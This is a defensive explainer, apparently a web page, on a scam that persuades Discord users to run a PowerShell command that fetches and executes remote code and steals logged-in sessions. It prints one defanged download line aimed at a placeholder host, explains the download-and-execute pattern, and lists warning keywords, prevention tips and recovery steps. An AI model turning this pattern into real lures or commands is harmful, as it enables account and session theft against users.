What the user sees
The lure presented to the victim
The message combines a reward, trust borrowed from a friend or familiar server, and artificial urgency. That combination makes an otherwise unusual request to run a command feel acceptable.
What happens behind the scenes
The technical attack flow
Technical breakdown
What the command is doing
$response = Invoke-WebRequest "hxxps://example[.]invalid/payload"
# The returned content is intentionally not executed in this sample.The example represents a common pattern: send a web request, receive text from a remote server, and evaluate the response as code. The domain and syntax have been replaced or truncated.
Invoke-WebRequest (iwr) sends HTTP or HTTPS requests to a web page or service.
Invoke-Expression (iex) evaluates a supplied string as a PowerShell command.
Combining download and execution in one line prevents the user from reviewing the payload and lets the remote operator change it later.
Why 2FA alone may not stop it
Authentication and sessions protect different stages
2FA is still important. It primarily strengthens verification for a new sign-in. Theft of an already authenticated session occurs after that stage.
- 1Enter password
- 2Complete 2FA
- 3Authentication succeeds
- 4Session is issued
- 1Malware runs
- 2Existing session is stolen
- 3Authenticated state is reused
- 4Account is operated
A session token helps maintain an authenticated state. If a valid session is stolen, an attacker may reuse that state instead of entering the password and completing 2FA again. Enabling 2FA does not necessarily revoke a session that has already been stolen; the session must be invalidated.
Prevention
Actions that stop this attack
- Do not trust instructions that require PowerShell or CMD to activate a free feature
- Stop when a command contains iwr, irm, iex, curl, or an unfamiliar shortened URL
- Verify the request through another channel even when it comes from a friend
- Enable Discord 2FA and store backup codes safely
- Keep the operating system, browser, and Discord updated
If you already ran it
Prioritized incident response
Changing a password on a potentially infected device may expose the new password too. Disconnect it first and, where possible, secure the account from another trusted device.
- 1Disconnect the device
Disable Wi-Fi or unplug Ethernet to stop additional communication and spread.
- 2Change passwords from a trusted device
Change Discord and every service that reused the same password.
- 3Log out all sessions
Invalidate authenticated sessions that may have been stolen.
- 4Review and reset 2FA
Check authenticators, passkeys, backup codes, and recovery methods.
- 5Scan and clean the device
Update your security software and run a full scan.
- 6Warn contacts and server staff
Tell people not to open messages, links, or files sent from your account.
Sources
Primary references and further reading